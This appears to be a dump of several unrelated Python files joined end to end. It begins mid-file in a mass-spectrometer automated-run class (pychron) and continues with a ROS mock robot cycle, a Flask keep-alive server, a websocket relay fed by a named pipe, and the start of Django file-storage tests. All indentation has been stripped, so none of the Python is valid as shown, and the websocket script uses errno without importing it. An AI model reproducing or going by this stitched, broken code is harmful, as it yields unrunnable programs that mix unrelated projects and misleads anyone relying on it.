self.debug('no default fits file')
fd = {}
return fd
def _get_default_fods(self):
def extract_fit_dict(fods, yd):
for yi in yd:
fod = {'filter_outliers': yi.get('filter_outliers', False),
'iterations': yi.get('filter_iterations', 0),
'std_devs': yi.get('filter_std_devs', 0)}
fods[yi['name']] = fod
sfods, bsfods = {}, {}
dfp = self._get_default_fits_file()
if dfp:
ys = yload(dfp)
extract_fit_dict(sfods, ys['signal'])
extract_fit_dict(bsfods, ys['baseline'])
return sfods, bsfods
def _start_script(self, name):
script = getattr(self, '{}_script'.format(name))
self.debug('start {}'.format(name))
if not self._alive:
self.warning('run is not alive')
return
if not script:
self.warning('no {} script'.format(name))
return
return True
def _add_active_detector(self, di):
spec = self.spectrometer_manager.spectrometer
det = spec.get_detector(di)
if det not in self._active_detectors:
self._active_detectors.append(det)
def _set_active_detectors(self, dets):
spec = self.spectrometer_manager.spectrometer
return [spec.get_detector(n) for n in dets]
def _define_detectors(self, isotope, det):
if self.spectrometer_manager:
spec = self.spectrometer_manager.spectrometer
spec.update_isotopes(isotope, det)
def _activate_detectors(self, dets):
"""
!!! this is a potential problem !!!
need more sophisticated way to set up plot panel
e.g PP has detectors H1, AX but AX, CDD are active.
need to remove H1 and add CDD.
or
if memory leak not a problem simply always "create" new plots
instead of only clearing data.
or use both techniques
if plot panel detectors != active detectors "create"
"""
self.debug('activate detectors')
if self.plot_panel is None:
create = True
else:
cd = set([d.name for d in self.plot_panel.detectors])
ad = set(dets)
create = cd - ad or ad - cd
p = self._new_plot_panel(self.plot_panel, stack_order='top_to_bottom')
self.plot_panel = p
self._active_detectors = self._set_active_detectors(dets)
self.spectrometer_manager.spectrometer.active_detectors = self._active_detectors
if create:
p.create(self._active_detectors)
else:
p.isotope_graph.clear_plots()
self.debug('clear isotope group')
self.isotope_group.clear_isotopes()
self.isotope_group.clear_error_components()
self.isotope_group.clear_blanks()
cb = False if any(self.spec.analysis_type.startswith(at) for at in NO_BLANK_CORRECT) else True
for d in self._active_detectors:
self.debug('setting isotope det={}, iso={}'.format(d.name, d.isotope))
self.isotope_group.set_isotope(d.isotope, d.name, (0, 0), correct_for_blank=cb)
self._load_previous()
self.debug('load analysis view')
p.analysis_view.load(self)
def _load_previous(self):
if not self.spec.analysis_type.startswith('blank') and not self.spec.analysis_type.startswith('background'):
pid, blanks, runid = self.previous_blanks
self.debug('setting previous blanks')
for iso, v in blanks.items():
self.isotope_group.set_blank(iso, v[0], v[1])
self._update_persister_spec(previous_blank_id=pid,
previous_blanks=blanks,
previous_blank_runid=runid)
self.isotope_group.clear_baselines()
baselines = self.previous_baselines
for iso, v in baselines.items():
self.isotope_group.set_baseline(iso, v[0], v[1])
def _add_conditionals(self):
klass_dict = {'actions': ActionConditional, 'truncations': TruncationConditional,
'terminations': TerminationConditional, 'cancelations': CancelationConditional,
'modifications': QueueModificationConditional}
t = self.spec.conditionals
self.debug('adding conditionals {}'.format(t))
if t:
p = os.path.join(paths.conditionals_dir, add_extension(t, '.yaml'))
if os.path.isfile(p):
self.debug('extract conditionals from file. {}'.format(p))
yd = yload(p)
failure = False
for kind, items in yd.items():
try:
klass = klass_dict[kind]
except KeyError:
self.debug('Invalid conditional kind="{}"'.format(kind))
continue
for cd in items:
try:
# trim off s
if kind.endswith('s'):
kind = kind[:-1]
self._conditional_appender(kind, cd, klass, location=p)
except BaseException as e:
self.debug('Failed adding {}. excp="{}", cd={}'.format(kind, e, cd))
failure = True
if failure:
if not self.confirmation_dialog('Failed to add Conditionals. Would you like to continue?'):
self.cancel_run(do_post_equilibration=False)
else:
try:
c, start = t.split(',')
pat = '<=|>=|[<>=]'
attr = re.split(pat, c)[0]
freq = 1
acr = 0.5
except Exception as e:
self.debug('conditionals parse failed {} {}'.format(e, t))
return
self.py_add_truncation(attr=attr, teststr=c,
start_count=int(start),
frequency=freq,
abbreviated_count_ratio=acr)
def _get_measurement_parameter(self, key, default=None):
return self._get_yaml_parameter(self.measurement_script, key, default)
def _get_extraction_parameter(self, key, default=None):
return self._get_yaml_parameter(self.extraction_script, key, default)
def _new_plot_panel(self, plot_panel, stack_order='bottom_to_top'):
title = self.runid
sample, irradiation = self.spec.sample, self.spec.display_irradiation
if sample:
title = '{} {}'.format(title, sample)
if irradiation:
title = '{} {}'.format(title, irradiation)
if plot_panel is None:
from pychron.experiment.plot_panel import PlotPanel
plot_panel = PlotPanel(
stack_order=stack_order,
info_func=self.info,
isotope_group=self.isotope_group)
self.debug('*************** Set Analysis View {}'.format(self.experiment_type))
plot_panel.set_analysis_view(self.experiment_type,
analysis_type=self.spec.analysis_type,
analysis_id=self.runid)
# an = plot_panel.analysis_view
# an.load(self)
plot_panel.trait_set(plot_title=title)
return plot_panel
def _convert_valve(self, valve):
if isinstance(valve, int):
valve = str(valve)
if valve and not isinstance(valve, (tuple, list)):
if ',' in valve:
valve = [v.strip() for v in valve.split(',')]
else:
valve = (valve,)
return valve
def _equilibrate(self, evt, eqtime=15, inlet=None, outlet=None,
delay=3,
do_post_equilibration=True, close_inlet=True):
inlet = self._convert_valve(inlet)
outlet = self._convert_valve(outlet)
elm = self.extraction_line_manager
if elm:
if outlet:
# close mass spec ion pump
for o in outlet:
for i in range(3):
ok, changed = elm.close_valve(o, mode='script')
if ok:
break
else:
time.sleep(0.1)
else:
from pychron.core.ui.gui import invoke_in_main_thread
invoke_in_main_thread(self.warning_dialog, 'Equilibration: Failed to Close "{}"'.format(o))
self.cancel_run(do_post_equilibration=False)
return
if inlet:
self.info('waiting {}s before opening inlet value {}'.format(delay, inlet))
time.sleep(delay)
# open inlet
for i in inlet:
for j in range(3):
ok, changed = elm.open_valve(i, mode='script')
if ok:
break
else:
time.sleep(0.1)
else:
from pychron.core.ui.gui import invoke_in_main_thread
invoke_in_main_thread(self.warning_dialog, 'Equilibration: Failed to Open "{}"'.format(i))
self.cancel_run(do_post_equilibration=False)
return
# set the passed in event
evt.set()
# delay for eq time
self.info('equilibrating for {}sec'.format(eqtime))
time.sleep(eqtime)
if self._alive:
# analyze the equilibration
try:
self._analyze_equilibration()
except BaseException as e:
self.debug('AutomatedRun._equilibrate _analyze_equilibration error. Exception={}'.format(e))
self.heading('Equilibration Finished')
if elm and inlet and close_inlet:
for i in inlet:
elm.close_valve(i, mode='script')
if do_post_equilibration:
self.do_post_equilibration()
if self.overlap_evt:
self.debug('setting overlap event. next run ok to start extraction')
self.overlap_evt.set()
def _analyze_equilibration(self):
if self.use_equilibration_analysis and self.plot_panel:
g = self.plot_panel.sniff_graph
xmi, xma = g.get_x_limits()
xma *= 1.25
g.set_x_limits(xmi, xma)
fxs = linspace(xmi, xma)
for i, p in enumerate(g.plots):
try:
xs = g.get_data(i)
except IndexError:
continue
ys = g.get_data(i, axis=1)
if ys is None:
continue
for ni, color, yoff in ((5, 'red', 30), (4, 'green', 10), (3, 'blue', -10), (2, 'orange', -30)):
xsi, ysi = xs[-ni:], ys[-ni:]
g.new_series(xsi, ysi, type='scatter', plotid=i, color=color,
marker_size=2.5)
coeffs = polyfit(xsi, ysi, 1)
fys = polyval(coeffs, fxs)
g.new_series(fxs, fys, type='line', plotid=i, color=color)
txt = 'Slope ({})={:0.3f}'.format(ni, coeffs[0])
g.add_plot_label(txt, plotid=i, overlay_position='inside right',
font='modern 14',
bgcolor='white',
color=color,
y_offset=yoff)
g.redraw()
def _update_labels(self):
self.debug('update labels {}'.format(self.plot_panel))
if self.plot_panel:
for g in (self.plot_panel.isotope_graph, self.plot_panel.sniff_graph):
if g:
self.debug('update labels "{}"'.format(g))
# update the plot_panel labels
plots = g.plots
n = len(plots)
names = []
multiples = []
for i, det in enumerate(self._active_detectors):
if i < n:
name = det.isotope
if name in names:
multiples.append(name)
name = '{}{}'.format(name, det.name)
plots[i].y_axis.title = name
self.debug('setting label {} {} {}'.format(i, det.name, name))
names.append(name)
for i, det in enumerate(self._active_detectors):
if i < n:
name = det.isotope
if name in multiples:
self.debug('second setting label {} {} {}'.format(i, det.name, name))
plots[i].y_axis.title = '{}{}'.format(name, det.name)
g.refresh()
def _update_detectors(self):
for det in self._active_detectors:
self.isotope_group.set_isotope_detector(det)
for det in self._active_detectors:
self.isotope_group.set_isotope_detector(det, add=True)
self._load_previous()
def _set_hv_position(self, pos, detector, update_detectors=True, update_labels=True, update_isotopes=True):
ion = self.ion_optics_manager
if ion is not None:
change = ion.hv_position(pos, detector, update_isotopes=update_isotopes)
def _set_magnet_position(self, pos, detector,
use_dac=False, update_detectors=True,
update_labels=True, update_isotopes=True,
remove_non_active=True, for_collection=True):
change = False
ion = self.ion_optics_manager
if ion is not None:
change = ion.position(pos, detector, use_dac=use_dac, update_isotopes=update_isotopes)
if for_collection:
if update_labels:
self._update_labels()
if update_detectors:
self._update_detectors()
if remove_non_active:
keys = list(self.isotope_group.keys())
for k in keys:
iso = self.isotope_group.isotopes[k]
det = next((di for di in self._active_detectors if di.isotope == iso.name), None)
if det is None:
self.isotope_group.pop(k)
def key(v):
return v[1].name
def key2(v):
return v[1].detector
self.debug('per cleaned {}'.format(keys))
for name, items in groupby_key(self.isotope_group.items(), key):
items = list(items)
if len(items) > 1:
for det, items in groupby_key(items, key2):
items = list(items)
if len(items) > 1:
for k, v in items:
if v.name == k:
self.isotope_group.isotopes.pop(k)
self.debug('cleaned isotope group {}'.format(keys))
if self.plot_panel:
self.debug('load analysis view')
self.plot_panel.analysis_view.load(self)
self.plot_panel.analysis_view.refresh_needed = True
return change
def _get_data_generator(self):
def gen():
cnt = 0
fcnt = self.failed_intensity_count_threshold
spec = self.spectrometer_manager.spectrometer
self._intensities = {}
while 1:
try:
k, s, t = spec.get_intensities(tagged=True)
except NoIntensityChange:
self.warning('Canceling Run. Intensity from mass spectrometer not changing')
try:
self.info('Saving run. Analysis did not complete successfully')
self.save()
except BaseException:
self.warning('Failed to save run')
self.cancel_run(state='failed')
yield None
if not k:
cnt += 1
self.info('Failed getting intensity from mass spectrometer {}/{}'.format(cnt, fcnt))
if cnt >= fcnt:
try:
self.info('Saving run. Analysis did not complete successfully')
self.save()
except BaseException:
self.warning('Failed to save run')
self.warning('Canceling Run. Failed getting intensity from mass spectrometer')
# do we need to cancel the experiment or will the subsequent pre run
# checks sufficient to catch spectrometer communication errors.
self.cancel_run(state='failed')
yield None
else:
yield None, None
else:
# reset the counter
cnt = 0
if self.intensity_scalar:
s = [si * self.intensity_scalar for si in s]
self._intensities['tags'] = k
self._intensities['signals'] = s
yield k, s, t
return gen()
def _whiff(self, ncounts, conditionals, starttime, starttime_offset, series, fit_series):
"""
conditionals: list of dicts
"""
for ci in conditionals:
if ci.get('start') is None:
ci['start'] = ncounts
conds = [conditional_from_dict(ci, ActionConditional) for ci in conditionals]
self.isotope_group.conditional_modifier = 'whiff'
self.collector.set_temporary_conditionals(conds)
self.py_data_collection(None, ncounts, starttime, starttime_offset, series, fit_series, group='whiff')
self.collector.clear_temporary_conditionals()
self.isotope_group.conditional_modifier = None
result = self.collector.measurement_result
self._update_persister_spec(whiff_result=result)
self.debug('WHIFF Result={}'.format(result))
return result
def _peak_hop(self, ncycles, ncounts, hops, grpname,
starttime, starttime_offset, series,
check_conditionals):
"""
ncycles: int
hops: list of tuples
hop = 'Isotope:Det[,Isotope:Det,...]', Count, Settling Time(s)
ex.
hop = 'Ar40:H1,Ar36:CDD', 10, 1
"""
self.peak_hop_collector.trait_set(ncycles=ncycles)
self.peak_hop_collector.set_hops(hops)
self.persister.build_peak_hop_tables(grpname, hops)
data_writer = self.persister.get_data_writer(grpname)
return self._measure(grpname,
data_writer,
ncounts,
starttime, starttime_offset,
series, check_conditionals, self.signal_color)
def _sniff(self, ncounts, starttime, starttime_offset, series):
self.debug('py_sniff')
if not self._alive:
return
p = self.plot_panel
if p:
p._ncounts = ncounts
p.is_baseline = False
self.plot_panel.show_sniff_graph()
gn = 'sniff'
self.persister.build_tables(gn, self._active_detectors, ncounts)
# mem_log('build tables')
check_conditionals = False
writer = self.persister.get_data_writer(gn)
result = self._measure(gn,
writer,
ncounts, starttime, starttime_offset,
series,
check_conditionals, self.sniff_color)
return result
def _measure(self, grpname, data_writer,
ncounts, starttime, starttime_offset,
series, check_conditionals, color, script=None):
if script is None:
script = self.measurement_script
# mem_log('pre measure')
if not self.spectrometer_manager:
self.warning('no spectrometer manager')
return True
self.info('measuring {}. ncounts={}'.format(grpname, ncounts),
color=MEASUREMENT_COLOR)
get_data = self._get_data_generator()
debug = globalv.experiment_debug
if debug:
period = 1
else:
period = self._integration_seconds
m = self.collector
m.trait_set(measurement_script=script,
detectors=self._active_detectors,
collection_kind=grpname,
series_idx=series,
check_conditionals=check_conditionals,
ncounts=ncounts,
period_ms=period * 1000,
data_generator=get_data,
data_writer=data_writer,
starttime=starttime,
experiment_type=self.experiment_type,
refresh_age=self.spec.analysis_type in ('unknown', 'cocktail'))
if hasattr(self.spectrometer_manager.spectrometer, 'trigger_acq'):
m.trait_set(trigger=self.spectrometer_manager.spectrometer.trigger_acq)
if self.plot_panel:
self.plot_panel.integration_time = period
self.plot_panel.set_ncounts(ncounts)
if grpname == 'sniff':
self._setup_isotope_graph(starttime_offset, color, grpname)
self._setup_sniff_graph(starttime_offset, color)
elif grpname == 'baseline':
self._setup_baseline_graph(starttime_offset, color)
else:
self._setup_isotope_graph(starttime_offset, color, grpname)
# time.sleep(0.5)
with self.persister.writer_ctx():
m.measure()
# mem_log('post measure')
if m.terminated:
self.debug('measurement terminated')
self.cancel_run(state='terminated')
if m.canceled:
self.debug('measurement collection canceled')
self.cancel_run()
self.executor_event = {'kind': 'cancel', 'confirm': False, 'err': m.err_message}
return not m.canceled
def _get_plot_id_by_ytitle(self, graph, pair, iso=None):
"""
pair is string in form <Iso><Det>, iso is just <Iso>
:param graph:
:param pair:
:param secondary:
:return:
"""
idx = graph.get_plotid_by_ytitle(pair)
if idx is None and iso:
if not isinstance(iso, str):
iso = iso.name
idx = graph.get_plotid_by_ytitle(iso)
return idx
def _update_limits(self, graph, starttime_offset):
# update limits
mi, ma = graph.get_x_limits()
max_ = ma
min_ = mi
tc = self.plot_panel.total_seconds
if tc > ma or ma == Inf:
max_ = tc
if starttime_offset > mi:
min_ = -starttime_offset
graph.set_x_limits(min_=min_, max_=max_ * 1.25)
def _setup_baseline_graph(self, starttime_offset, color):
graph = self.plot_panel.baseline_graph
self._update_limits(graph, starttime_offset)
for det in self._active_detectors:
idx = graph.get_plotid_by_ytitle(det.name)
if idx is not None:
try:
graph.series[idx][0]
except IndexError as e:
graph.new_series(marker='circle',
color=color,
type='scatter',
marker_size=1.25,
fit='linear',
plotid=idx,
use_error_envelope=False,
add_inspector=False,
add_tools=False)
def _setup_sniff_graph(self, starttime_offset, color):
graph = self.plot_panel.sniff_graph
self._update_limits(graph, starttime_offset)
series = self.collector.series_idx
for k, iso in self.isotope_group.items():
idx = self._get_plot_id_by_ytitle(graph, k, iso)
if idx is not None:
try:
graph.series[idx][series]
except IndexError as e:
graph.new_series(marker='circle',
color=color,
type='scatter',
marker_size=1.25,
fit=None,
plotid=idx,
use_error_envelope=False,
add_inspector=False,
add_tools=False)
def _setup_isotope_graph(self, starttime_offset, color, grpname):
"""
execute in main thread is necessary.
set the graph limits and construct the necessary series
set 0-count fits
"""
graph = self.plot_panel.isotope_graph
self._update_limits(graph, starttime_offset)
regressing = grpname != 'sniff'
series = self.collector.series_idx
for k, iso in self.isotope_group.items():
idx = self._get_plot_id_by_ytitle(graph, k, iso)
if idx is not None:
try:
graph.series[idx][series]
except IndexError as e:
fit = None if grpname == 'sniff' else iso.get_fit(0)
graph.new_series(marker='circle',
color=color,
type='scatter',
marker_size=1.25,
fit=fit,
plotid=idx,
use_error_envelope=False,
add_inspector=False,
add_tools=False)
if regressing:
graph.set_regressor(iso.regressor, idx)
scnt, fcnt = (2, 1) if regressing else (1, 0)
self.debug('"{}" increment series count="{}" '
'fit count="{}" regressing="{}"'.format(grpname, scnt, fcnt, regressing))
self.measurement_script.increment_series_counts(scnt, fcnt)
def _wait_for(self, predicate, msg):
st = time.time()
i = 0
while self._alive:
time.sleep(1.0)
et = time.time() - st
if predicate(et):
break
if i % 5 == 0:
self.debug(msg(et))
i = 0
i += 1
def _wait_for_min_ms_pumptime(self):
overlap, mp = self.spec.overlap
pt = self.min_ms_pumptime
if not overlap:
self.debug('no overlap. not waiting for min ms pumptime')
return
if self.is_first:
self.debug('this is the first run. not waiting for min ms pumptime')
return
if not mp:
self.debug('using default min ms pumptime={}'.format(pt))
mp = pt
# ensure mim mass spectrometer pump time
# wait until pumping started
self.debug('wait for mass spec pump out to start')
self._wait_for(lambda x: self.ms_pumptime_start is not None,
lambda x: 'waiting for mass spec pumptime to start {:0.2f}'.format(x))
# wait for min pump time
self.debug('mass spec pump out to started')
self._wait_for(lambda x: self.elapsed_ms_pumptime > mp,
lambda x: 'waiting for min mass spec pumptime {}, elapse={:0.2f}'.format(mp, x))
self.debug('min pumptime elapsed {} {}'.format(mp, self.elapsed_ms_pumptime))
# ===============================================================================
# scripts
# ===============================================================================
def _load_script(self, name):
script = None
sname = getattr(self.script_info, '{}_script_name'.format(name))
if sname and sname != NULL_STR:
sname = self._make_script_name(sname)
script = self._bootstrap_script(sname, name)
return script
def _bootstrap_script(self, fname, name):
# global SCRIPTS
global WARNED_SCRIPTS
def warn(fn, e):
self.spec.executable = False
if fn not in WARNED_SCRIPTS:
WARNED_SCRIPTS.append(fn)
self.warning_dialog('Invalid Script {}\n{}'.format(fn, e))
self.debug('loading script "{}"'.format(fname))
func = getattr(self, '_{}_script_factory'.format(name))
s = func()
if s and os.path.isfile(s.filename):
if s.bootstrap():
s.set_default_context()
else:
fname = s.filename if s else fname
e = 'Not a file'
warn(fname, e)
return s
def _measurement_script_factory(self):
from pychron.pyscripts.measurement_pyscript import MeasurementPyScript
sname = self.script_info.measurement_script_name
sname = self._make_script_name(sname)
from pychron.spectrometer.thermo.manager.base import ThermoSpectrometerManager
from pychron.spectrometer.isotopx.manager.ngx import NGXSpectrometerManager
klass = MeasurementPyScript
if isinstance(self.spectrometer_manager, ThermoSpectrometerManager):
from pychron.pyscripts.thermo_measurement_pyscript import ThermoMeasurementPyScript
klass = ThermoMeasurementPyScript
elif isinstance(self.spectrometer_manager, NGXSpectrometerManager):
from pychron.pyscripts.ngx_measurement_pyscript import NGXMeasurementPyScript
klass = NGXMeasurementPyScript
ms = klass(root=paths.measurement_dir, name=sname, automated_run=self, runner=self.runner)
return ms
def _extraction_script_factory(self, klass=None):
ext = self._ext_factory(paths.extraction_dir, self.script_info.extraction_script_name, klass=klass)
if ext is not None:
ext.automated_run = self
return ext
def _post_measurement_script_factory(self):
return self._ext_factory(paths.post_measurement_dir, self.script_info.post_measurement_script_name)
def _post_equilibration_script_factory(self):
return self._ext_factory(paths.post_equilibration_dir, self.script_info.post_equilibration_script_name)
def _ext_factory(self, root, file_name, klass=None):
file_name = self._make_script_name(file_name)
if os.path.isfile(os.path.join(root, file_name)):
if klass is None:
from pychron.pyscripts.extraction_line_pyscript import ExtractionPyScript
klass = ExtractionPyScript
obj = klass(root=root, name=file_name, runner=self.runner)
return obj
def _make_script_name(self, name):
name = '{}_{}'.format(self.spec.mass_spectrometer.lower(), name)
return add_extension(name, '.py')
def _setup_context(self, script):
"""
setup_context to expose variables to the pyscript
"""
ctx = self.spec.make_script_context()
script.setup_context(is_last=self.is_last, **ctx)
def _get_yaml_parameter(self, script, key, default):
if not script:
return default
m = ast.parse(script.text)
docstr = ast.get_docstring(m)
if docstr:
docstr = docstr.strip()
# self.debug('{} {} metadata\n{}'.format(script.name, key, docstr))
try:
params = yload(docstr)
return params[key]
except KeyError:
self.warning('No value "{}" in metadata'.format(key))
except TypeError:
self.warning('Invalid yaml docstring in "{}". Could not retrieve "{}"'.format(script.name, key))
else:
self.debug('No metadata section in "{}". Using default "{}" value for "{}"'.format(script.name,
default, key))
return default
def _get_collector(self):
c = self.peak_hop_collector if self.is_peak_hop else self.multi_collector
return c
def _assemble_extraction_blob(self):
_names, txt = self._assemble_script_blob(kinds=(EXTRACTION, POST_EQUILIBRATION, POST_MEASUREMENT))
return txt
def _assemble_script_blob(self, kinds=None):
if kinds is None:
kinds = SCRIPT_KEYS
okinds = []
bs = []
for s in kinds:
sc = getattr(self, '{}_script'.format(s))
if sc is not None:
bs.append((sc.name, sc.toblob()))
okinds.append(s)
return assemble_script_blob(bs, kinds=okinds)
# ===============================================================================
# handlers
# ===============================================================================
def _runner_changed(self, new):
self.debug('Runner runner:{}'.format(new))
for s in SCRIPT_NAMES:
sc = getattr(self, s)
if sc is not None:
setattr(sc, 'runner', new)
# ===============================================================================
# defaults
# ===============================================================================
def _peak_hop_collector_default(self):
from pychron.experiment.automated_run.peak_hop_collector import PeakHopCollector
c = PeakHopCollector(console_display=self.console_display,
automated_run=self)
return c
def _multi_collector_default(self):
from pychron.experiment.automated_run.multi_collector import MultiCollector
c = MultiCollector(console_display=self.console_display,
automated_run=self)
return c
# ===============================================================================
# property get/set
# ===============================================================================
@property
def elapsed_ms_pumptime(self):
return time.time() - self.ms_pumptime_start
# ============= EOF =============================================
|
mock_full_cycle.py | import threading
import time
import rospy
from std_msgs.msg import String, Bool
from mock.mock_robot_consumption import mock_robot_consumption
from mock.mock_current_step import mock_current_step, Step
from mock.mock_resistance import mock_resistance
from mock.mock_puck_colors import mock_puck_colors
from mock.mock_letters import mock_letters
from mock.mock_puck_is_in_grip import mock_puck_is_in_grip
from mock.mock_puck_is_not_in_grip import mock_puck_is_not_in_grip
rospy.init_node('mock_full_cycle', anonymous=True)
robot_consumption_publisher = rospy.Publisher('robot_consumption', String, queue_size=10)
current_step_publisher = rospy.Publisher('current_step', String, queue_size=10)
resistance_publisher = rospy.Publisher('resistance', String, queue_size=10)
puck_colors_publisher = rospy.Publisher('puck_colors', String, queue_size=10)
letters_publisher = rospy.Publisher('letters', String, queue_size=10)
movement_publisher = rospy.Publisher('movement_vectors_string', String, queue_size=10)
def handle_start_cycle(_):
execute_then_sleep(mock_current_step, current_step_publisher, Step.ToResistanceStation.name)
execute_then_sleep(mock_current_step, current_step_publisher, Step.ReadResistance.name)
execute_then_sleep(mock_resistance, resistance_publisher)
execute_then_sleep(mock_puck_colors, puck_colors_publisher)
execute_then_sleep(mock_current_step, current_step_publisher, Step.ToControlPanel.name)
execute_then_sleep(mock_current_step, current_step_publisher, Step.ReadControlPanel.name)
execute_then_sleep(mock_letters, letters_publisher)
execute_then_sleep(mock_current_step, current_step_publisher, Step.ToFirstPuckAndGrabFirstPuck.name)
execute_then_sleep(mock_puck_is_in_grip, movement_publisher)
execute_then_sleep(mock_current_step, current_step_publisher, Step.ToFirstCornerAndReleaseFirstPuck.name)
execute_then_sleep(mock_puck_is_not_in_grip, movement_publisher)
execute_then_sleep(mock_current_step, current_step_publisher, Step.ToSecondPuckAndGrabSecondPuck.name)
execute_then_sleep(mock_puck_is_in_grip, movement_publisher)
execute_then_sleep(mock_current_step, current_step_publisher, Step.ToSecondCornerAndReleaseSecondPuck.name)
execute_then_sleep(mock_puck_is_not_in_grip, movement_publisher)
execute_then_sleep(mock_current_step, current_step_publisher, Step.ToThirdPuckAndGrabThirdPuck.name)
execute_then_sleep(mock_puck_is_in_grip, movement_publisher)
execute_then_sleep(mock_current_step, current_step_publisher, Step.ToThirdCornerAndReleaseThirdPuck.name)
execute_then_sleep(mock_puck_is_not_in_grip, movement_publisher)
execute_then_sleep(mock_current_step, current_step_publisher, Step.ToSquareCenter.name)
execute_then_sleep(mock_current_step, current_step_publisher, Step.CycleEndedAndRedLedOn.name)
def execute_then_sleep(execute, *args):
execute(*args)
time.sleep(1)
def mock_full_cycle():
threading.Thread(target=lambda: mock_robot_consumption(robot_consumption_publisher)).start()
rospy.Subscriber("start_cycle", Bool, handle_start_cycle)
rospy.spin()
if __name__ == '__main__':
mock_full_cycle()
|
alive.py | from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Bot started! Running..."
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
websocket.py | import asyncio
import websockets
import sys
import os, tempfile
from signal import *
from config import named_pipe_path, websocket_port, websocket_host, debug_mode, use_ssl, cert_file, key_file, refresh_rate
import threading
from queue import Queue
import json
import time
import ssl
if debug_mode:
print ("Websocket CLI Debug mode is ON")
if debug_mode:
print ("cert_file "+cert_file)
print ("key_file "+key_file)
try:
if debug_mode:
print("creating fifo")
os.mkfifo(named_pipe_path)
if debug_mode:
print("fifo created")
except OSError as oe:
if oe.errno != errno.EEXIST:
raise
# queue of messages to be delivered
my_queue = Queue(maxsize=0)
# list of connected clients on ws
connected_list = []
# list of authenticated clients
identified_map = dict()
async def connectionHandler(websocket, path):
global connected_list
global identified_map
connected_list.append(websocket)
try:
message = await websocket.recv()
except:
connected_list.remove(websocket)
decoded_message = json.loads(message)
identified_map[decoded_message['recipient']] = connected_list.index(websocket)
if debug_mode:
print ("Add to connected list index: " + str(connected_list.index(websocket)) + " litening to recipient: " + decoded_message['recipient'])
try:
await asyncio.sleep(3600 * 24)
except:
connected_list.remove(websocket)
def read_file_callback():
time.sleep(refresh_rate)
tmp = fifo.readline()
if tmp != "":
if debug_mode:
print("Received data: "+tmp)
data = json.loads(tmp)
my_queue.put(data)
async def send_messages():
global connected_list
global identified_map
while True:
message = my_queue.get()
if message['recipient'] in identified_map:
connected_index = identified_map[message['recipient']]
if debug_mode:
print ("Connected list index: " + str(connected_index))
i = connected_list[connected_index]
if i.state_name == 'OPEN':
data = {"content": message['content']}
await i.send(json.dumps(data))
else:
if debug_mode:
print ("No one listening to recipient: " + message['recipient'])
def websocket_thread():
second_loop = asyncio.new_event_loop()
if use_ssl:
ctx = ssl.SSLContext( ssl.PROTOCOL_SSLv23)
ctx.load_cert_chain(cert_file, key_file)
start_server = websockets.serve(connectionHandler, websocket_host, websocket_port, ssl=ctx)
else:
start_server = websockets.serve(connectionHandler, websocket_host, websocket_port)
second_loop.run_until_complete(start_server)
second_loop.run_forever()
return
def message_dispatch_thread():
third_loop = asyncio.new_event_loop()
third_loop.run_until_complete(send_messages())
third_loop.run_forever()
return
threads = []
t = threading.Thread(target=websocket_thread)
threads.append(t)
t.start()
t2 = threading.Thread(target=message_dispatch_thread)
threads.append(t2)
t2.start()
loop = asyncio.get_event_loop()
fifo = open(named_pipe_path, 'r', 1)
loop.add_reader(fifo.fileno(), read_file_callback)
loop.run_forever()
if debug_mode:
print ("Exiting")
def clean(*args):
os.remove(named_pipe_path)
sys.exit(0)
for sig in (SIGABRT, SIGILL, SIGINT, SIGSEGV, SIGTERM):
signal(sig, clean)
|
tests.py | import os
import shutil
import sys
import tempfile
import threading
import time
import unittest
from datetime import datetime, timedelta
from io import StringIO
from urllib.request import urlopen
from django.core.cache import cache
from django.core.exceptions import SuspiciousFileOperation
from django.core.files.base import ContentFile, File
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.core.files.uploadedfile import (
InMemoryUploadedFile, SimpleUploadedFile, TemporaryUploadedFile,
)
from django.db.models.fields.files import FileDescriptor
from django.test import (
LiveServerTestCase, SimpleTestCase, TestCase, override_settings,
)
from django.test.utils import requires_tz_support
from django.urls import NoReverseMatch, reverse_lazy
from django.utils import timezone
from .models import Storage, temp_storage, temp_storage_location
FILE_SUFFIX_REGEX = '[A-Za-z0-9]{7}'
class GetStorageClassTests(SimpleTestCase):
def test_get_filesystem_storage(self):
"""
get_storage_class returns the class for a storage backend name/path.
"""
self.assertEqual(
get_storage_class('django.core.files.storage.FileSystemStorage'),
FileSystemStorage)
def test_get_invalid_storage_module(self):
"""
get_storage_class raises an error if the requested import don't exist.
"""
with self.assertRaisesMessage(ImportError, "No module named 'storage'"):
get_storage_class('storage.NonexistentStorage')
def test_get_nonexistent_storage_class(self):
"""
get_storage_class raises an error if the requested class don't exist.
"""
with self.assertRaises(ImportError):
get_storage_class('django.core.files.storage.NonexistentStorage')
def test_get_nonexistent_storage_module(self):
"""
get_storage_class raises an error if the requested module don't exist.
"""
with self.assertRaisesMessage(ImportError, "No module named 'django.core.files.nonexistent_storage'"):
get_storage_class('django.core.files.nonexistent_storage.NonexistentStorage')
class FileSystemStorageTests(unittest.TestCase):
def test_deconstruction(self):
path, args, kwargs = temp_storage.deconstruct()
self.assertEqual(path, "django.core.files.storage.FileSystemStorage")
self.assertEqual(args, ())
self.assertEqual(kwargs, {'location': temp_storage_location})
kwargs_orig = {
'location': temp_storage_location,
'base_url': 'http://myfiles.example.com/'
}
storage = FileSystemStorage(**kwargs_orig)
path, args, kwargs = storage.deconstruct()
self.assertEqual(kwargs, kwargs_orig)
def test_lazy_base_url_init(self):
"""
FileSystemStorage.__init__() shouldn't evaluate base_url.
"""
storage = FileSystemStorage(base_url=reverse_lazy('app:url'))
with self.assertRaises(NoReverseMatch):
storage.url(storage.base_url)
class FileStorageTests(SimpleTestCase):
storage_class = FileSystemStorage
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = self.storage_class(location=self.temp_dir, base_url='/test_media_url/')
# Set up a second temporary directory which is ensured to have a mixed
# case name.
self.temp_dir2 = tempfile.mkdtemp(suffix='aBc')
def tearDown(self):
shutil.rmtree(self.temp_dir)
shutil.rmtree(self.temp_dir2)
def test_empty_location(self):
"""
Makes sure an exception is raised if the location is empty
"""
storage = self.storage_class(location='')
self.assertEqual(storage.base_location, '')
self.assertEqual(storage.location, os.getcwd())
def test_file_access_options(self):
"""
Standard file access options are available, and work as expected.
"""
self.assertFalse(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'w')
f.write('storage contents')
f.close()
self.assertTrue(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'r')
self.assertEqual(f.read(), 'storage contents')
f.close()
